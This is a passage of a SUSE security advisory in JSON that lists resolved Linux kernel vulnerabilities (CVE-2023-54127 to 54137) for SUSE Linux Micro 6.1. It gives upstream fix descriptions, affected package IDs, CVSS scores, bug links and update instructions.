"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54127"
},
{
"cve": "CVE-2023-54133",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54133"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnfp: clean mc addresses in application firmware when closing port\n\nWhen moving devices from one namespace to another, mc addresses are\ncleaned in software while not removed from application firmware. Thus\nthe mc addresses are remained and will cause resource leak.\n\nNow use `__dev_mc_unsync` to clean mc addresses when closing port.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54133",
"url": "https://www.suse.com/security/cve/CVE-2023-54133"
},
{
"category": "external",
"summary": "SUSE Bug 1256104 for CVE-2023-54133",
"url": "https://bugzilla.suse.com/1256104"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54133"
},
{
"cve": "CVE-2023-54134",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54134"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nautofs: fix memory leak of waitqueues in autofs_catatonic_mode\n\nSyzkaller reports a memory leak:\n\nBUG: memory leak\nunreferenced object 0xffff88810b279e00 (size 96):\n comm \"syz-executor399\", pid 3631, jiffies 4294964921 (age 23.870s)\n hex dump (first 32 bytes):\n 00 00 00 00 00 00 00 00 08 9e 27 0b 81 88 ff ff ..........\u0027.....\n 08 9e 27 0b 81 88 ff ff 00 00 00 00 00 00 00 00 ..\u0027.............\n backtrace:\n [\u003cffffffff814cfc90\u003e] kmalloc_trace+0x20/0x90 mm/slab_common.c:1046\n [\u003cffffffff81bb75ca\u003e] kmalloc include/linux/slab.h:576 [inline]\n [\u003cffffffff81bb75ca\u003e] autofs_wait+0x3fa/0x9a0 fs/autofs/waitq.c:378\n [\u003cffffffff81bb88a7\u003e] autofs_do_expire_multi+0xa7/0x3e0 fs/autofs/expire.c:593\n [\u003cffffffff81bb8c33\u003e] autofs_expire_multi+0x53/0x80 fs/autofs/expire.c:619\n [\u003cffffffff81bb6972\u003e] autofs_root_ioctl_unlocked+0x322/0x3b0 fs/autofs/root.c:897\n [\u003cffffffff81bb6a95\u003e] autofs_root_ioctl+0x25/0x30 fs/autofs/root.c:910\n [\u003cffffffff81602a9c\u003e] vfs_ioctl fs/ioctl.c:51 [inline]\n [\u003cffffffff81602a9c\u003e] __do_sys_ioctl fs/ioctl.c:870 [inline]\n [\u003cffffffff81602a9c\u003e] __se_sys_ioctl fs/ioctl.c:856 [inline]\n [\u003cffffffff81602a9c\u003e] __x64_sys_ioctl+0xfc/0x140 fs/ioctl.c:856\n [\u003cffffffff84608225\u003e] do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n [\u003cffffffff84608225\u003e] do_syscall_64+0x35/0xb0 arch/x86/entry/common.c:80\n [\u003cffffffff84800087\u003e] entry_SYSCALL_64_after_hwframe+0x63/0xcd\n\nautofs_wait_queue structs should be freed if their wait_ctr becomes zero.\nOtherwise they will be lost.\n\nIn this case an AUTOFS_IOC_EXPIRE_MULTI ioctl is done, then a new\nwaitqueue struct is allocated in autofs_wait(), its initial wait_ctr\nequals 2. After that wait_event_killable() is interrupted (it returns\n-ERESTARTSYS), so that \u0027wq-\u003ename.name == NULL\u0027 condition may be not\nsatisfied. Actually, this condition can be satisfied when\nautofs_wait_release() or autofs_catatonic_mode() is called and, what is\nalso important, wait_ctr is decremented in those places. Upon the exit of\nautofs_wait(), wait_ctr is decremented to 1. Then the unmounting process\nbegins: kill_sb calls autofs_catatonic_mode(), which should have freed the\nwaitqueues, but it only decrements its usage counter to zero which is not\na correct behaviour.\n\nedit:imk\nThis description is of course not correct. The umount performed as a result\nof an expire is a umount of a mount that has been automounted, it\u0027s not the\nautofs mount itself. They happen independently, usually after everything\nmounted within the autofs file system has been expired away. If everything\nhasn\u0027t been expired away the automount daemon can still exit leaving mounts\nin place. But expires done in both cases will result in a notification that\ncalls autofs_wait_release() with a result status. The problem case is the\nsummary execution of of the automount daemon. In this case any waiting\nprocesses won\u0027t be woken up until either they are terminated or the mount\nis umounted.\nend edit: imk\n\nSo in catatonic mode we should free waitqueues which counter becomes zero.\n\nedit: imk\nInitially I was concerned that the calling of autofs_wait_release() and\nautofs_catatonic_mode() was not mutually exclusive but that can\u0027t be the\ncase (obviously) because the queue entry (or entries) is removed from the\nlist when either of these two functions are called. Consequently the wait\nentry will be freed by only one of these functions or by the woken process\nin autofs_wait() depending on the order of the calls.\nend edit: imk",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54134",
"url": "https://www.suse.com/security/cve/CVE-2023-54134"
},
{
"category": "external",
"summary": "SUSE Bug 1256106 for CVE-2023-54134",
"url": "https://bugzilla.suse.com/1256106"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54134"
},
{
"cve": "CVE-2023-54135",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54135"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmaple_tree: fix potential out-of-bounds access in mas_wr_end_piv()\n\nCheck the write offset end bounds before using it as the offset into the\npivot array. This avoids a possible out-of-bounds access on the pivot\narray if the write extends to the last slot in the node, in which case the\nnode maximum should be used as the end pivot.\n\nakpm: this doesn\u0027t affect any current callers, but new users of mapletree\nmay encounter this problem if backported into earlier kernels, so let\u0027s\nfix it in -stable kernels in case of this.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54135",
"url": "https://www.suse.com/security/cve/CVE-2023-54135"
},
{
"category": "external",
"summary": "SUSE Bug 1256107 for CVE-2023-54135",
"url": "https://bugzilla.suse.com/1256107"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54135"
},
{
"cve": "CVE-2023-54136",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54136"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nserial: sprd: Fix DMA buffer leak issue\n\nRelease DMA buffer when _probe() returns failure to avoid memory leak.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54136",
"url": "https://www.suse.com/security/cve/CVE-2023-54136"
},
{
"category": "external",
"summary": "SUSE Bug 1256099 for CVE-2023-54136",
"url": "https://bugzilla.suse.com/1256099"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54136"
},
{
"cve": "CVE-2023-54137",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54137"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nvfio/type1: fix cap_migration information leak\n\nFix an information leak where an uninitialized hole in struct\nvfio_iommu_type1_info_cap_migration on the stack is exposed to userspace.\n\nThe definition of struct vfio_iommu_type1_info_cap_migration contains a hole as\nshown in this pahole(1) output:\n\n struct vfio_iommu_type1_info_cap_migration {\n struct vfio_info_cap_header header; /* 0 8 */\n __u32 flags; /* 8 4 */\n\n /* XXX 4 bytes hole, try to pack */\n\n __u64 pgsize_bitmap; /* 16 8 */\n __u64 max_dirty_bitmap_size; /* 24 8 */\n\n /* size: 32, cachelines: 1, members: 4 */\n /* sum members: 28, holes: 1, sum holes: 4 */\n /* last cacheline: 32 bytes */\n };\n\nThe cap_mig variable is filled in without initializing the hole:\n\n static int vfio_iommu_migration_build_caps(struct vfio_iommu *iommu,\n struct vfio_info_cap *caps)\n {\n struct vfio_iommu_type1_info_cap_migration cap_mig;\n\n cap_mig.header.id = VFIO_IOMMU_TYPE1_INFO_CAP_MIGRATION;\n cap_mig.header.version = 1;\n\n cap_mig.flags = 0;\n /* support minimum pgsize */\n cap_mig.pgsize_bitmap = (size_t)1 \u003c\u003c __ffs(iommu-\u003epgsize_bitmap);\n cap_mig.max_dirty_bitmap_size = DIRTY_BITMAP_SIZE_MAX;\n\n return vfio_info_add_capability(caps, \u0026cap_mig.header, sizeof(cap_mig));\n }\n\nThe structure is then copied to a temporary location on the heap. At this point\nit\u0027s already too late and ioctl(VFIO_IOMMU_GET_INFO) copies it to userspace\nlater:\n\n int vfio_info_add_capability(struct vfio_info_cap *caps,\n struct vfio_info_cap_header *cap, size_t size)\n {\n struct vfio_info_cap_header *header;\n\n header = vfio_info_cap_add(caps, size, cap-\u003eid, cap-\u003eversion);\n if (IS_ERR(header))\n return PTR_ERR(header);\n\n memcpy(header + 1, cap + 1, size - sizeof(*header));\n\n return 0;\n }\n\nThis issue was found by code inspection.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
